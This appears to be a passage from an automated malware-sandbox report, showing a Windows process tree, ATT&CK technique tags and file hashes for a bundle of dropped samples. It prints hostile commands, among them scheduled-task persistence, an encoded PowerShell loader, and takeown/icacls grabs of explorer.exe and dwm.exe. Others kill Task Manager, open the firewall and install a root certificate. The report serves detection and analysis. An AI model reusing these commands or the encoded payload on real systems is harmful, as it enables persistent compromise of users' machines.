C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat" "13⤵PID:3296
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3328
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3724
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:992 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:3376
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat" "15⤵PID:2488
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3276
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2464
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:848 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:1148
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat" "17⤵PID:2168
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3380
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:764
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3336 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat" "19⤵PID:3856
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:3376
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2020
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1540 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:1684
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat" "21⤵PID:2328
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3152
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3108
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:912 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:3640
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat" "23⤵PID:3908
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:4016
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:492
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2852 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:1500
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat" "25⤵PID:2328
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:3264
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3288
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"26⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3328 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:3156
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat" "27⤵PID:1924
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:280
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2064
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exethe.exe3⤵
- Executes dropped EXE
PID:2496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
PID:2024 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:3864
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1"3⤵
- System Location Discovery: System Language Discovery
PID:2520
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3300
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3356
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3764
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1500
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2092
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:3276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2280
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2260
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3308
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exefreebobux.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3052 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat""4⤵
- Loads dropped DLL
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:1496
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\x.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:3108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exeSolaraBootstraper.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3112
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Executes dropped EXE
PID:3332 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:2604
-
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:2804 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3924
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3360
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dllwim.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2872 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd" "4⤵PID:3060
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\cringe.mp4"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3568
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\lol.ini5⤵PID:1256
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\mailgooglecom.json5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2980
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\CLOCK.py5⤵
- Modifies registry class
PID:2408
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer3⤵
- Modifies system certificate store
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exef3cb220f1aaa32ca310586e5f62dcab1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3328
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:1596
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:4060
-
-
C:\Windows\SysWOW64\regedit.exeregedit3⤵
- System Location Discovery: System Language Discovery
- Runs regedit.exe
PID:3332
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:22⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2744
-
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:824
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{512bbd22-4f1b-194d-e1f1-cd06e8f26378}\droidcam.inf" "9" "6e67c8bbf" "00000000000005DC" "WinSta0\Default" "00000000000005D4" "208" "c:\program files (x86)\droidcam\lib"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\pnpui.dll,InstallSecurityPromptRunDllW 20 Global\{540e316d-1e11-02b0-5321-292876b9ca2d} Global\{6eb0db00-4d67-6993-166d-7d1fdab5c452} C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem2.inf" "droidcam.inf:MicrosoftDS.NTAMD64:DroidCam_PCMEX:1.0.0.1:droidcam" "6e67c8bbf" "00000000000005DC" "00000000000005FC" "00000000000005F8"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5841⤵PID:3476
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Component Object Model Hijacking
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Component Object Model Hijacking
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
4Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Discovery
Password Policy Discovery
1Process Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
942KB
MD5f8c12fc1b20887fdb70c7f02f0d7bfb3
SHA128d18fd281e17c919f81eda3a2f0d8765f57049f
SHA256082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933
SHA51297c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f
-
Filesize
87KB
MD5de2a97a1e50afa4fec443a8930606ddf
SHA14133434c37472ab14443704dd9ad8e8546f3098f
SHA2565cf6e6e22cba884b20da6cf701546613792c15f30d4c27273a432fb185f29416
SHA512d25e638a7925d0be5bbb081f5edda506603252916c3d3868d2bcdcc31484547efb893130a6b5eccc781bfece702c59d34fe67a84a48e379916fc15568adcdc49
-
Filesize
254B
MD5cfaaa32cc4fd40e36512f768bd75a0e1
SHA16ed1063ab547f65aace2fd98713df6d29834c19a
SHA256d7b86a37b02fed2794904cb28c0fa64a1e0d2218fab608250c8531c1b9ddc439
SHA512d2fe74d8e10b6378c48b72c9e22515a31592859d1f725bc86d9e48fcce9f7421e7afe477feb1c2041ff46b2620ad4244c887c670dc25e8acd70029e2166a0a93
-
Filesize
2.9MB
MD56bb0ab3bcd076a01605f291b23ac11ba
SHA1c486e244a5458cb759b35c12b342a33230b19cdf
SHA256959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621
-
Filesize
947B
MD579e4a9840d7d3a96d7c04fe2434c892e
SHA1a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436
SHA2564348a0e9444c78cb265e058d5e8944b4d84f9662bd26db257f8934a443c70161
SHA51253b444e565183201a61eeb461209b2dc30895eeca487238d15a026735f229a819e5b19cbd7e2fa2768ab2a64f6ebcd9d1e721341c9ed5dd09fc0d5e43d68bca7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD583f08621d274f0c9dd94c7bcdf1ddb40
SHA177737f46f6c0b4a013a51c480746bd2e24a463aa
SHA2565d41383bebee44a15032a724a293f84757f6c1dbf083a7ffd9a1d61549da6890
SHA512ef1c274e8571f84cdf7cd128fc93ed3d015487dfd4ca53d488915fd772313a6fbde76da0985ecb566c3eec8af98740358abe989ec74e6e85ac3dd8f8dcd43b7b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56f068416fafec50a710c939dfb2204d3
SHA1183d3448e09291e79e347c4825b1feb252a1de57
SHA25626b71fcb9f7187eaf238b86c7762b4eb75ad55a277394e4744151f3e788f9503
SHA512fbe74b3bfe6dbe4615ea7ef59dc33e0a03c4bf8d736baea7710c12942337c6888ea3519ddbe23f8f4a4e0b9644741dbda906dcc6cd0d268ffaeb17b9c3d87ae9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD53bc05f185b22c4eb2225c3f07dd8beb4
SHA18c1d46d8f0505d6ccdfb8834189e66fa9e32e4dd
SHA25616c74e4e3ecd0099ba7595d4317a1078a71ec9f2d65bba8c79baaa9ada7c9371
SHA512b3b2b4ef9e1d5e065c2f9ae2e9950a26c83119b1fbb0ac8e48c12aa229982e4e599bc7669e5cf0c2841500c9566d8e5ae4e7b7f62f6d59cb1b7e22e5120fc0ca
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD572c7c8c07101b27fa3fd40a5d8ac513e
SHA1d373b24220c13fee50f08d1062950230718327af
SHA256a285995a999416ded29bff78c6cd6398fe7f57dc95e763713314aa59b8f5b2cb
SHA512c15f71832bf7c6ba0121f67bc0e45e71f94ad44d9a31837d258c378b5e32460a716d5a8cc64d305ffba30e7d367952ecba1f3625c4093450a6f2ae2444c5e272
-
